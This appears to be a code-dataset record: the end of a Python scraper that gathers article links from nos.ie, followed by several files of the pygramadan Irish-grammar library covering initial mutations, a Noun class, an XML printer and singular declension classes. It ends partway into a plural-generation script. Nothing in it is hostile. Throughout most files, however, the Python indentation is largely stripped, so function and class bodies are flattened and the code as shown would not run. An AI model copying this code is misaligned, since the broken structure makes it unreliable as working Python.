    if content and content.h1 and content.h1.span:
        return content.h1.span.get_text(strip=True)
    else:
        return ''
def _get_details(soup):
details = {}
pubdet = soup.find("div", {"id": "single-publish-details"})
    ptags = pubdet.find_all('p')
    if len(ptags) > 0 and ptags[0].b:
        details['author'] = ptags[0].b.get_text(strip=True)
    if len(ptags) > 1:
        details['date'] = ptags[1].get_text(strip=True)
broll = pubdet.find("div", {"class": "blogroll-tag-category"})
cats = set()
for cat in broll.find_all("a", {"class": "featured-category"}):
if cat.get_text(strip=True) != "":
cats.add(cat.get_text(strip=True))
if len(cats) > 0:
details['categories'] = list(cats)
tags = set()
for tag in broll.find_all("a", {"class": "featured-tag"}):
if tag.get_text(strip=True) != "":
tags.add(tag.get_text(strip=True))
if len(tags) > 0:
details['tags'] = list(tags)
return details
def _get_remainder(soup):
    pagination = soup.find("div", {"class": "pagination"})
    if not pagination:
        return []
    current = pagination.find("span", {"class": "current"})
    if not (current and current.get_text(strip=True) == "1"):
        return []
    cats = pagination.find_all('a')
    if not cats:
        return []
    last_url = cats[-1].get('href', '')
if not last_url:
return []
m = re.match("(.*/)([0-9]+)/$", last_url)
if not m:
return []
base = m.group(1)
num = int(m.group(2)) + 1
return [f'{base}{i}/' for i in range(2, num)]
def _collect_articles(soup):
out = set()
for art in soup.find_all("article", {"class": "blogroll-post"}):
        a = art.find('a')
        if a and a.get('href'):
            out.add(a.get('href'))
return list(out)
def _read_menu():
page = requests.get("http://nos.ie/")
soup = BeautifulSoup(page.text, 'lxml')
menu = soup.find("ul", {"id": "menu-main-menu"})
cat_pages = set()
for li in menu.find_all("li"):
if li.a:
cat_pages.add(li.a['href'])
return cat_pages
def _get_article_list(urls):
rest = set()
articles = set()
for url in urls:
page = requests.get(url)
soup = BeautifulSoup(page.text, 'lxml')
new = _get_remainder(soup)
rest = rest.union(new)
art = _collect_articles(soup)
articles = articles.union(art)
for url in rest:
page = requests.get(url)
soup = BeautifulSoup(page.text, 'lxml')
art = _collect_articles(soup)
articles = articles.union(art)
return list(articles)
``` |
{
"source": "jimregan/pygramadan",
"score": 3
} |
#### File: pygramadan/pygramadan/mutation.py
```python
from typing import List
def safestart(text: str, piece: str, lc: bool = False) -> bool:
"""
Checks if text starts with another, safely
:param text: the string to check
:param piece: the start string
:return: true if text starts with piece
"""
check = text if lc else text.lower()
return len(text) >= len(piece) and check.startswith(piece)
def is_vowel(char: str) -> bool:
"""
Checks if the character is an Irish vowel (aeiouáéíóú).
:param char: the character to check
:return: true if the input is a single character, and is an Irish vowel
"""
vowels = "aeiouáéíóú"
return len(char) == 1 and char.lower()[0] in vowels
def is_uppervowel(char: str) -> bool:
"""
Checks if the character is an uppercase Irish vowel (aeiouáéíóú).
:param char: the character to check
:return: true if the input is a single character, is uppercase, and is an Irish vowel
"""
vowels = "AEIOUÁÉÍÓÚ"
return len(char) == 1 and char[0] in vowels
def ends_dentals(text: str) -> bool:
"""
Checks if the word ends with a "dentals" consonant.
("DeNTalS" is a mnemonic to remember the consonants dnts)
:param text: the string to check
:return: true if the input ends with one of 'dnts'
"""
return text.lower()[-1] in "dnts"
def starts_bilabial(text: str) -> bool:
"""
Checks if the word starts with b, m, or p.
:param text: the string to check
:return: true if the input starts with one of 'bmp'
"""
return len(text) > 0 and text.lower()[0] in "bmp"
def starts_vowel(text: str) -> bool:
"""
Checks if the word starts with a vowel.
:param text: the string to check
:return: true if the input starts with a vowel
"""
return len(text) > 0 and is_vowel(text[0])
def ends_vowel(text: str) -> bool:
"""
Checks if the word ends with a vowel.
:param text: the string to check
:return: true if the input ends with a vowel
"""
return len(text) > 0 and is_vowel(text[-1])
def starts_uppervowel(text: str) -> bool:
"""
Checks if the word starts with an uppercase vowel.
:param text: the string to check
:return: true if the input starts with an uppercase vowel
"""
return len(text) > 0 and is_uppervowel(text[0])
def starts_vowelfhx(text: str) -> bool:
"""
Checks if the word starts with a vowel, or 'fh', unless
followed by l or r.
:param text: the string to check
:return: true if the input starts with a vowel or fh, but not fhl or fhr
"""
lc = text.lower()
if lc[0:3] == 'fhl' or lc[0:3] == 'fhr':
return False
else:
return lc[0:2] == 'fh' or starts_vowel(text)
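# Illustrative examples: starts_vowelfhx("uisce") and starts_vowelfhx("fhear") are True,
# while starts_vowelfhx("fhliuch") is False.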
def starts_fvowel(text: str) -> bool:
"""
Checks if the word starts with a vowel, or 'f'.
:param text: the string to check
:return: true if the input starts with a vowel or f
"""
return len(text) > 0 and (is_vowel(text[0]) or text[0].lower() == 'f')
def starts_fthenvowel(text: str) -> bool:
"""
Checks if the word starts with 'f' followed by a vowel
:param text: the string to check
:return: true if the input starts with f followed by a vowel
"""
return text[0:1].lower() == 'f' and starts_vowel(text[1:])
def is_mutable_s(text: str) -> bool:
"""
Checks if the word starts with a mutable 's'.
('s' is mutable when followed by a vowel, n, r, or l)
:param text: the string to check
:return: true if the input starts with a mutable s
"""
lc = text.lower()
return len(lc) >= 2 and lc[0] == 's' and lc[1] in "rnlaeiouáéíóú"
def lenition(text: str, restriction: str = "") -> str:
"""
Lenites the string.
Lenition (séimhiú) is an initial mutation that applies to consonants.
The orthographical realisation is via the insertion of 'h' after
the initial consonant, if applicable: 'bcdfgmpst' are the letters that
can be lenited; however, certain environments have restrictions on
certain letters.
:param text: the string to be lenited
:param restriction: prevent lenition from being applied to these characters
:return: the lenited string, if applicable, otherwise the value of text
>>> from pygramadan.mutation import lenition
>>> lenition("cat")
'chat'
"""
def dolen(text: str) -> str:
if text[0:2].isupper():
return text[0] + 'H' + text[1:]
else:
return text[0] + 'h' + text[1:]
if len(text) > 1 and text.lower()[1] == 'j':
return text
lc = text.lower()
if len(text) >= 1 and lc[0] in "bcdfgmpt" and lc[0] not in restriction:
return dolen(text)
elif is_mutable_s(text) and 's' not in restriction:
return dolen(text)
else:
return text
def d_lenition(text, restriction=""):
"""
Helper function for past tense mutation, where vowels are
prefixed with "d'", and 'f' is lenited and prefixed with "d'"
:param text: the string to be lenited
:param restriction: prevent lenition from being applied to these characters
:return: the lenited string, if applicable, otherwise the value of text
>>> from pygramadan.mutation import d_lenition
>>> d_lenition("fág")
"d'fhág"
"""
lc = text.lower()
if starts_vowel(text):
return "d'" + text
elif lc[0:1] == 'f':
return "d'" + lenition(text, restriction)
else:
return lenition(text, restriction)
def eclipsis(text: str, restriction: str = "") -> str:
"""
Eclipses the string.
Eclipsis (urú) is an initial mutation that applies to consonants and vowels.
Voiced consonants and vowels are nasalised, while devoiced consonants are
voiced. Orthographically, this is realised by prepending a consonant with
the new phonetic value to the word.
With consonants, this new value "eclipses" the original, e.g., 'c' is
eclipsed as 'gc': only the 'g' is pronounced.
:param text: the string to be eclipsed
:param restriction: prevent eclipsis from being applied to these characters
:return: the eclipsed string, if applicable, otherwise the value of text
>>> from pygramadan.mutation import eclipsis
>>> eclipsis("cat")
'gcat'
"""
mut = {
'b': 'm',
'c': 'g',
'd': 'n',
'f': 'bh',
'g': 'n',
'p': 'b',
't': 'd'
}
    if len(text) < 1:
        return text
    firstl = text.lower()[0]
if is_uppervowel(text[0]):
return "n" + text
elif firstl == text[0] and is_vowel(text[0]):
return "n-" + text
elif firstl in mut and firstl not in restriction:
return mut[firstl] + text
else:
return text
def unlenite(text: str) -> str:
"""
Removes lenition from a word.
:param text: the string to unlenite
:return: the string with lenition removed, if applicable, otherwise unmodified
>>> from pygramadan.mutation import unlenite
>>> unlenite("chat")
'cat'
"""
cons = "bcdfgmpst"
lc = text.lower()
if len(text) >= 2 and lc[0] in cons and lc[1] == 'h':
return text[0] + text[2:]
else:
return text
def _safestart_list(text: str, pieces: List[str], lc: bool = False) -> bool:
"""safestart() but for a list of pieces"""
for piece in pieces:
if safestart(text, piece, lc):
return True
return False
def uneclipse(text: str) -> str:
"""
Removes eclipsis from a word.
:param text: the string to uneclipse
:return: the string with eclipse removed, if applicable, otherwise unmodified
>>> from pygramadan.mutation import uneclipse
>>> uneclipse("gcat")
'cat'
"""
if safestart(text, "bhf"):
return text[2:]
elif safestart(text, "n-") and is_vowel(text[2:3]):
return text[2:]
elif text[0:1] == 'n' and is_uppervowel(text[1:2]):
return text[1:]
elif _safestart_list(text, ["mb", "gc", "nd", "ng", "bp", "dt"]):
return text[1:]
else:
return text
```
#### File: pygramadan/pygramadan/noun.py
```python
from .forms import Form, FormPlGen, FormSg
from .attributes import Gender
from .xml_helpers import formsg_node, formpl_node, formplgen_node, write_sg, write_pl, write_pl_gen
from typing import List
import xml.etree.ElementTree as ET
class Noun:
def __str__(self) -> str:
return self._gramadan_string()
def _gramadan_string(self) -> str:
snom = 'sgNom: [' + '] ['.join([f.value for f in self.sg_nom]) + '] \n'
sgen = 'sgGen: [' + '] ['.join([f.value for f in self.sg_gen]) + '] \n'
svoc = 'sgVoc: [' + '] ['.join([f.value for f in self.sg_voc]) + '] \n'
sdat = 'sgDat: [' + '] ['.join([f.value for f in self.sg_dat]) + '] \n'
pnom = 'plNom: [' + '] ['.join([f.value for f in self.pl_nom]) + '] \n'
pgen = 'plGen: [' + '] ['.join([f.value for f in self.pl_gen]) + '] \n'
pvoc = 'plVoc: [' + '] ['.join([f.value for f in self.pl_voc]) + '] \n'
return snom + sgen + svoc + sdat + pnom + pgen + pvoc
def __init__(self,
source = None,
definite: bool = False,
proper: bool = False,
immutable: bool = False,
article_genitive: bool = False,
disambig: str = "",
declension: int = 0,
sg_nom: List[FormSg] = None,
sg_gen: List[FormSg] = None,
sg_voc: List[FormSg] = None,
sg_dat: List[FormSg] = None,
pl_nom: List[Form] = None,
pl_gen: List[FormPlGen] = None,
pl_voc: List[Form] = None,
count: List[Form] = None) -> None:
self.is_definite: bool = definite
self.is_proper: bool = proper
self.is_immutable: bool = immutable
self.article_genitive: bool = article_genitive
# Keep track of generated "dative"
self.artificial_dative = True
self.disambig: str = disambig
self.declension: int = declension
        self.sg_nom: List[FormSg] = sg_nom
        self.sg_gen: List[FormSg] = sg_gen
        self.sg_voc: List[FormSg] = sg_voc
        self.sg_dat: List[FormSg] = sg_dat
        self.pl_nom: List[Form] = pl_nom
        self.pl_gen: List[FormPlGen] = pl_gen
        self.pl_voc: List[Form] = pl_voc
        self.count: List[Form] = count
if self.sg_nom is None:
self.sg_nom = []
if self.sg_gen is None:
self.sg_gen = []
if self.sg_voc is None:
self.sg_voc = []
if self.sg_dat is None:
self.sg_dat = []
if self.pl_nom is None:
self.pl_nom = []
if self.pl_gen is None:
self.pl_gen = []
if self.pl_voc is None:
self.pl_voc = []
if self.count is None:
self.count = []
if source is not None:
self._empty()
self.from_xml(source)
self.add_dative()
def _empty(self):
"""Clear the current contents"""
self.is_definite = False
self.is_proper = False
self.is_immutable = False
self.article_genitive = False
self.disambig = ""
self.declension = 0
self.sg_nom = []
self.sg_gen = []
self.sg_voc = []
self.sg_dat = []
self.pl_nom = []
self.pl_gen = []
self.pl_voc = []
self.count = []
    def get_lemma(self) -> str:
        if self.sg_nom:
            return self.sg_nom[0].value
        return ""
def get_identifier(self) -> str:
"""
Get an identifier for this noun
Note: called getNickname() in Gramadán
"""
gender = "fem" if self.get_gender() == Gender.Fem else "masc"
disambig = ""
if self.disambig != "":
disambig = "_" + self.disambig
outlem = self.get_lemma().replace(" ", "_")
return f'{outlem}_{gender}_{self.declension}{disambig}'
def get_gender(self) -> Gender:
return self.sg_nom[0].gender
def add_dative(self) -> None:
if len(self.sg_dat) == 0:
for form in self.sg_nom:
self.sg_dat.append(FormSg(form.value, form.gender))
self.artificial_dative = True
def to_xml(self):
props = {}
props['default'] = self.get_lemma()
props['declension'] = str(self.declension)
props['disambig'] = self.disambig
props['isProper'] = '1' if self.is_proper else '0'
props['isDefinite'] = '1' if self.is_definite else '0'
props['isImmutable'] = '1' if self.is_immutable else '0'
props['allowArticledGenitive'] = '1' if self.article_genitive else '0'
root = ET.Element('noun', props)
write_sg(self.sg_nom, 'sgNom', root)
write_sg(self.sg_gen, 'sgGen', root)
if not self.artificial_dative:
write_sg(self.sg_dat, 'sgDat', root)
write_sg(self.sg_voc, 'sgVoc', root)
write_pl(self.pl_nom, 'plNom', root)
write_pl_gen(self.pl_gen, 'plGen', root)
write_pl(self.pl_voc, 'plVoc', root)
write_pl(self.count, 'count', root)
return ET.tostring(root, encoding='UTF-8')
def from_xml(self, source) -> None:
"""
Initialise from XML in BuNaMo format:
>>> from pygramadan.noun import Noun
>>> import io
>>> xml = \"\"\"<noun default="ainm" declension="4" disambig="" isProper="0" isDefinite="0" allowArticledGenitive="0">
... <sgNom default="ainm" gender="masc" />
... <sgGen default="ainm" gender="masc" />
... <plNom default="ainmneacha" />
... <plGen default="ainmneacha" strength="strong" />
... </noun>\"\"\"
>>> sio = io.StringIO(xml)
>>> ainm = Noun(source=sio)
"""
tree = ET.parse(source)
root = tree.getroot()
self.is_definite = True if root.attrib['isDefinite'] == '1' else False
self.is_proper = True if root.attrib['isProper'] == '1' else False
if 'isImmutable' in root.attrib and root.attrib['isImmutable'] == '1':
self.is_immutable = True
else:
self.is_immutable = False
if 'allowArticledGenitive' in root.attrib and root.attrib['allowArticledGenitive'] == '1':
self.article_genitive = True
else:
self.article_genitive = False
self.disambig = root.attrib['disambig']
self.declension = int(root.attrib['declension'])
formsg_node(root, './sgNom', self.sg_nom)
formsg_node(root, './sgGen', self.sg_gen)
formsg_node(root, './sgVoc', self.sg_voc)
formsg_node(root, './sgDat', self.sg_dat)
if len(self.sg_dat) != 0:
self.artificial_dative = False
formpl_node(root, './plNom', self.pl_nom)
formplgen_node(root, './plGen', self.pl_gen)
formpl_node(root, './plVoc', self.pl_voc)
formpl_node(root, './count', self.count)
def get_all_forms(self, fake_dative = False):
"""
Returns a list of tuples, `(part-of-speech, form)`:
>>> ainm.get_all_forms()
[('sg_nom', 'ainm'), ('pl_gen', 'ainmneacha'), ('sg_gen', 'ainm'), ('pl_nom', 'ainmneacha')]
        Unless `fake_dative` is True, artificially generated "dative" forms (copies of the nominative) are omitted
"""
forms = set()
for nom_sg in self.sg_nom:
tpl = ('sg_nom', nom_sg.value)
forms.add(tpl)
for gen_sg in self.sg_gen:
tpl = ('sg_gen', gen_sg.value)
forms.add(tpl)
for voc_sg in self.sg_voc:
tpl = ('sg_voc', voc_sg.value)
forms.add(tpl)
for dat_sg in self.sg_dat:
if not self.artificial_dative or fake_dative:
tpl = ('sg_dat', dat_sg.value)
forms.add(tpl)
for nom_pl in self.pl_nom:
tpl = ('pl_nom', nom_pl.value)
forms.add(tpl)
for gen_pl in self.pl_gen:
tpl = ('pl_gen', gen_pl.value)
forms.add(tpl)
for voc_pl in self.pl_voc:
tpl = ('pl_voc', voc_pl.value)
forms.add(tpl)
for count in self.count:
tpl = ('count', count.value)
forms.add(tpl)
return list(forms)
def get_unique_forms(self):
"""
Returns a list of unique word forms:
>>> ainm.get_unique_forms()
['ainm', 'ainmneacha']
"""
return list(set([a[1] for a in self.get_all_forms()]))
```
#### File: pygramadan/pygramadan/printer_neid.py
```python
from .mutation import starts_vowel
from .opers import mutate
from .attributes import Mutation, VPTense, VPPerson
from .attributes import VPShape, VPPolarity, VPMood
from .adjective import Adjective
from .noun import Noun
from .noun_phrase import NP
from .prepositional_phrase import PP
from .preposition import Preposition
from .verb import Verb
from .verb_phrase import VP
from typing import List
import xml.etree.ElementTree as ET
DCL = ET.PI('xml', "version='1.0' encoding='utf-8'")
XSL = ET.PI('xml-stylesheet', "type='text/xsl' href='!gram.xsl'")
NL = bytes('\n', encoding='UTF-8')
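# Typical usage (illustrative): PrinterNeid().print_noun_xml(Noun(source=...)) returns
# UTF-8-encoded XML bytes, optionally prefixed with the XML and stylesheet declarations.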
class PrinterNeid:
def __init__(self, with_xml_declarations = True) -> None:
self.with_xml_declarations = with_xml_declarations
def print_noun_xml(self, n: Noun) -> str:
np = NP(n)
props = {}
props['lemma'] = n.get_lemma()
props['uid'] = n.get_identifier()
root = ET.Element('Lemma', props)
nprops = {}
nprops['gender'] = n.get_gender().name.lower()
nprops['declension'] = str(n.declension)
ntag = ET.SubElement(root, 'noun', nprops)
def _do_element(noun_tag, lista, listb, name):
for sng in zip(lista, listb):
grouptag = ET.SubElement(noun_tag, name)
artn = ET.SubElement(grouptag, 'articleNo')
artn.text = sng[0].value
arty = ET.SubElement(grouptag, 'articleYes')
arty.text = sng[1].value
_do_element(ntag, np.sg_nom, np.sg_nom_art, 'sgNom')
_do_element(ntag, np.sg_gen, np.sg_gen_art, 'sgGen')
_do_element(ntag, np.pl_nom, np.pl_nom_art, 'plNom')
_do_element(ntag, np.pl_gen, np.pl_gen_art, 'plGen')
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_np_xml(self, np: NP) -> str:
props = {}
props['lemma'] = np.get_lemma()
props['uid'] = np.get_identifier()
root = ET.Element('Lemma', props)
nprops = {}
nprops['gender'] = np.get_gender().name.lower()
nprops['forceNominative'] = '1' if np.force_nominative else '0'
ntag = ET.SubElement(root, 'nounPhrase', nprops)
def _do_element(noun_tag, lista, listb, name):
for sng in zip(lista, listb):
grouptag = ET.SubElement(noun_tag, name)
artn = ET.SubElement(grouptag, 'articleNo')
artn.text = sng[0].value
arty = ET.SubElement(grouptag, 'articleYes')
arty.text = sng[1].value
_do_element(ntag, np.sg_nom, np.sg_nom_art, 'sgNom')
_do_element(ntag, np.sg_gen, np.sg_gen_art, 'sgGen')
_do_element(ntag, np.pl_nom, np.pl_nom_art, 'plNom')
_do_element(ntag, np.pl_gen, np.pl_gen_art, 'plGen')
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_adjective_xml(self, adj: Adjective) -> str:
props = {}
props['lemma'] = adj.get_lemma()
props['uid'] = adj.get_identifier()
root = ET.Element('Lemma', props)
aprops = {}
aprops['declension'] = str(adj.declension)
atag = ET.SubElement(root, 'adjective', aprops)
        def _do_tags(root, forms, name, mut):
            for sub in forms:
subtag = ET.SubElement(root, name)
subtag.text = mutate(mut, sub.value)
_do_tags(atag, adj.sg_nom, 'sgNomMasc', Mutation.NoMut)
_do_tags(atag, adj.sg_nom, 'sgNomFem', Mutation.Len1)
_do_tags(atag, adj.sg_gen_masc, 'sgGenMasc', Mutation.Len1)
_do_tags(atag, adj.sg_gen_fem, 'sgGenFem', Mutation.NoMut)
_do_tags(atag, adj.pl_nom, 'plNom', Mutation.NoMut)
_do_tags(atag, adj.pl_nom, 'plNomSlen', Mutation.Len1)
_do_tags(atag, adj.pl_nom, 'plGenStrong', Mutation.NoMut)
_do_tags(atag, adj.sg_nom, 'plGenWeak', Mutation.NoMut)
for form in adj.get_compar_pres():
subtag = ET.SubElement(atag, 'comparPres')
subtag.text = form.value
for form in adj.get_compar_past():
subtag = ET.SubElement(atag, 'comparPast')
subtag.text = form.value
for form in adj.get_super_pres():
subtag = ET.SubElement(atag, 'superPres')
subtag.text = form.value
for form in adj.get_super_past():
subtag = ET.SubElement(atag, 'superPast')
subtag.text = form.value
for form in adj.abstract:
subtag = ET.SubElement(atag, 'abstractNoun')
subtag.text = form.value
for form in adj.abstract:
subtag = ET.SubElement(atag, 'abstractNounExamples')
ssubtag1 = ET.SubElement(subtag, 'example')
ssubtag1.text = "dá " + mutate(Mutation.Len1, form.value)
ssubtag2 = ET.SubElement(subtag, 'example')
if starts_vowel(form.value):
ssubtag2.text = "ag dul in " + mutate(Mutation.NoMut, form.value)
else:
ssubtag2.text = "ag dul i " + mutate(Mutation.Ecl1, form.value)
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_pp_xml(self, pp: PP) -> str:
props = {}
props['lemma'] = pp.get_lemma()
props['uid'] = pp.get_identifier()
root = ET.Element('Lemma', props)
ntag = ET.SubElement(root, 'prepositionalPhrase')
for sng in zip(pp.sg, pp.sg_art_n, pp.sg_art_s):
grouptag = ET.SubElement(ntag, 'sg')
artn = ET.SubElement(grouptag, 'articleNo')
artn.text = sng[0].value
if sng[1].value == sng[2].value:
arty = ET.SubElement(grouptag, 'articleYes')
arty.text = sng[1].value
else:
artyn = ET.SubElement(grouptag, 'articleYes', {'var': 'north'})
artyn.text = sng[1].value
artys = ET.SubElement(grouptag, 'articleYes', {'var': 'south'})
artys.text = sng[2].value
for plr in zip(pp.pl, pp.pl_art):
grouptag = ET.SubElement(ntag, 'pl')
artn = ET.SubElement(grouptag, 'articleNo')
artn.text = plr[0].value
arty = ET.SubElement(grouptag, 'articleYes')
arty.text = plr[1].value
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_preposition_xml(self, prep: Preposition) -> str:
props = {}
props['lemma'] = prep.get_lemma()
props['uid'] = prep.get_identifier()
root = ET.Element('Lemma', props)
ptag = ET.SubElement(root, 'preposition')
for form in prep.sg1:
subtag = ET.SubElement(ptag, 'persSg1')
subtag.text = form.value
for form in prep.sg2:
subtag = ET.SubElement(ptag, 'persSg2')
subtag.text = form.value
for form in prep.sg3_masc:
subtag = ET.SubElement(ptag, 'persSg3Masc')
subtag.text = form.value
for form in prep.sg3_fem:
subtag = ET.SubElement(ptag, 'persSg3Fem')
subtag.text = form.value
for form in prep.pl1:
subtag = ET.SubElement(ptag, 'persPl1')
subtag.text = form.value
for form in prep.pl2:
subtag = ET.SubElement(ptag, 'persPl2')
subtag.text = form.value
for form in prep.pl3:
subtag = ET.SubElement(ptag, 'persPl3')
subtag.text = form.value
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_verb_xml(self, v: Verb) -> str:
props = {}
props['lemma'] = v.get_lemma()
props['uid'] = v.get_identifier()
root = ET.Element('Lemma', props)
_TENSES = {
"past": VPTense.Past,
"present": VPTense.PresCont,
"future": VPTense.Fut,
"condi": VPTense.Cond,
"pastConti": VPTense.PastCont
}
if v.get_lemma() == 'bí':
_TENSES['present'] = VPTense.Pres
_TENSES['presentConti'] = VPTense.PresCont
_PERSON = {
"sg1": VPPerson.Sg1,
"sg2": VPPerson.Sg2,
"sg3Masc": VPPerson.Sg3Masc,
"sg3Fem": VPPerson.Sg3Fem,
"pl1": VPPerson.Pl1,
"pl2": VPPerson.Pl2,
"pl3": VPPerson.Pl3,
"auto": VPPerson.Auto
}
ptag = ET.SubElement(root, 'verb')
for form in v.verbal_noun:
subtag = ET.SubElement(ptag, 'vn')
subtag.text = form.value
for form in v.verbal_adj:
subtag = ET.SubElement(ptag, 'va')
subtag.text = form.value
vp = VP(v)
for tense in _TENSES.keys():
ttag = ET.SubElement(ptag, tense)
for pers in _PERSON.keys():
perstag = ET.SubElement(ttag, pers)
for form in vp.tenses[_TENSES[tense]][VPShape.Declar][_PERSON[pers]][VPPolarity.Pos]:
ftag = ET.SubElement(perstag, 'pos')
ftag.text = form.value
for form in vp.tenses[_TENSES[tense]][VPShape.Interrog][_PERSON[pers]][VPPolarity.Pos]:
ftag = ET.SubElement(perstag, 'quest')
ftag.text = form.value + '?'
for form in vp.tenses[_TENSES[tense]][VPShape.Declar][_PERSON[pers]][VPPolarity.Neg]:
ftag = ET.SubElement(perstag, 'neg')
ftag.text = form.value
_MOODS = {
"imper": VPMood.Imper,
"subj": VPMood.Subj
}
for mood in _MOODS:
mtag = ET.SubElement(ptag, mood)
for pers in _PERSON.keys():
perstag = ET.SubElement(mtag, pers)
for form in vp.moods[_MOODS[mood]][_PERSON[pers]][VPPolarity.Pos]:
if _MOODS[mood] == VPMood.Imper:
value = form.value + '!'
else:
value = form.value
ftag = ET.SubElement(perstag, 'pos')
ftag.text = value
for form in vp.moods[_MOODS[mood]][_PERSON[pers]][VPPolarity.Neg]:
if _MOODS[mood] == VPMood.Imper:
value = form.value + '!'
else:
value = form.value
ftag = ET.SubElement(perstag, 'neg')
ftag.text = value
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
```
#### File: pygramadan/pygramadan/singular_info.py
```python
from .attributes import Gender
from .forms import Form
from .opers import VOWELS, VOWELS_BROAD, VOWELS_SLENDER, broaden_target, slenderise_target, syncopate
from typing import List
import re
class SingularInfo():
def __init__(self,
gender: Gender = None,
nominative: List[Form] = None,
genitive: List[Form] = None,
vocative: List[Form] = None,
dative: List[Form] = None) -> None:
self.gender = gender
self.nominative = nominative
self.genitive = genitive
self.vocative = vocative
self.dative = dative
if self.nominative is None:
self.nominative = []
if self.genitive is None:
self.genitive = []
if self.vocative is None:
self.vocative = []
if self.dative is None:
self.dative = []
def __str__(self) -> str:
return self._gramadan_string()
def _gramadan_string(self) -> str:
nom = 'NOM: [' + '] ['.join([f.value for f in self.nominative]) + '] \n'
gen = 'GEN: [' + '] ['.join([f.value for f in self.genitive]) + '] \n'
voc = 'VOC: [' + '] ['.join([f.value for f in self.vocative]) + '] \n'
dat = 'DAT: [' + '] ['.join([f.value for f in self.dative]) + '] \n'
return nom + gen + voc + dat
class SingularInfoO(SingularInfo):
"""Singular class O: all cases are identical."""
def __init__(self, lemma: str = "", gender: Gender = None):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=[Form(lemma)],
vocative=[Form(lemma)],
dative=[Form(lemma)])
class SingularInfoC(SingularInfo):
"""Singular class C: genitive and vocative formed by slenderisation."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
slenderisation_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=None,
dative=[Form(lemma)])
form = re.sub('ch$', 'gh', lemma)
form = slenderise_target(form, slenderisation_target)
if gender == Gender.Fem:
self.vocative.append(Form(lemma))
form = re.sub("igh$", "í", form)
self.genitive.append(Form(form))
else:
self.vocative.append(Form(form))
self.genitive.append(Form(form))
class SingularInfoL(SingularInfo):
"""Singular class L: genitive formed by broadening."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
broadening_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = broaden_target(lemma, broadening_target)
self.genitive.append(Form(form))
class SingularInfoE(SingularInfo):
"""Singular class E: genitive formed by suffix "-e"."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
syncopation: bool = False,
double_dative: bool = False,
slenderisation_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=None)
form = lemma
if syncopation:
form = syncopate(form)
form = slenderise_target(form, slenderisation_target)
self.dative.append(Form(form))
if double_dative:
self.dative.append(Form(lemma))
form = re.sub(r"([" + VOWELS + "])ngt$", r"\1ngth", form)
form = re.sub(r'ú$', 'aith', form)
form += 'e'
self.genitive.append(Form(form))
class SingularInfoA(SingularInfo):
"""Singular class A: genitive formed by suffix "-a"."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
syncopation: bool = False,
broadening_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
form = re.sub(r"([" + VOWELS_SLENDER + "])rt$", r"\1rth", form)
form = re.sub(r"([" + VOWELS_SLENDER + "])(nn?)t$", r"\1\2", form)
if syncopation:
form = syncopate(form)
form = broaden_target(form, broadening_target)
form += 'a'
self.genitive.append(Form(form))
class SingularInfoD(SingularInfo):
"""Singular class D: genitive ends in "-d"."""
def __init__(self,
lemma: str = "",
gender: Gender = None):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
form = re.sub(r"([" + VOWELS_BROAD + "])$", r"\1d", form)
form = re.sub(r"([" + VOWELS_SLENDER + "])$", r"\1ad", form)
self.genitive.append(Form(form))
class SingularInfoN(SingularInfo):
"""Singular class N: genitive ends in "-n"."""
def __init__(self,
lemma: str = "",
gender: Gender = None):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
form = re.sub(r"([" + VOWELS_BROAD + "])$", r"\1n", form)
form = re.sub(r"([" + VOWELS_SLENDER + "])$", r"\1an", form)
self.genitive.append(Form(form))
class SingularInfoEAX(SingularInfo):
"""Singular class EAX: genitive ends in "-each"."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
syncopation: bool = False,
slenderisation_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
if syncopation:
form = syncopate(lemma)
form = slenderise_target(form, slenderisation_target)
form += 'each'
self.genitive.append(Form(form))
class SingularInfoAX(SingularInfo):
"""Singular class AX: genitive ends in "-ach"."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
syncopation: bool = False,
broadening_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
if syncopation:
form = syncopate(lemma)
form = broaden_target(form, broadening_target)
form += 'ach'
self.genitive.append(Form(form))
```
#### File: pygramadan/scripts/generate_connacht_plurals.py
```python
import argparse
from pygramadan.noun import Noun
from pathlib import Path
import sys
"""
Connacht plurals for -acha/-anna are -achaí/-annaí
(derived from the old dative plurals -achaibh/-annaibh)
Even if these forms are to be included in the pronunciation
lexicon as variants, these forms are easier to generate
with G2P as they map to the correct vowel.
"""
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--bunamo", type=str, help="path to BuNaMo")
args = parser.parse_args()
if args.bunamo is None:
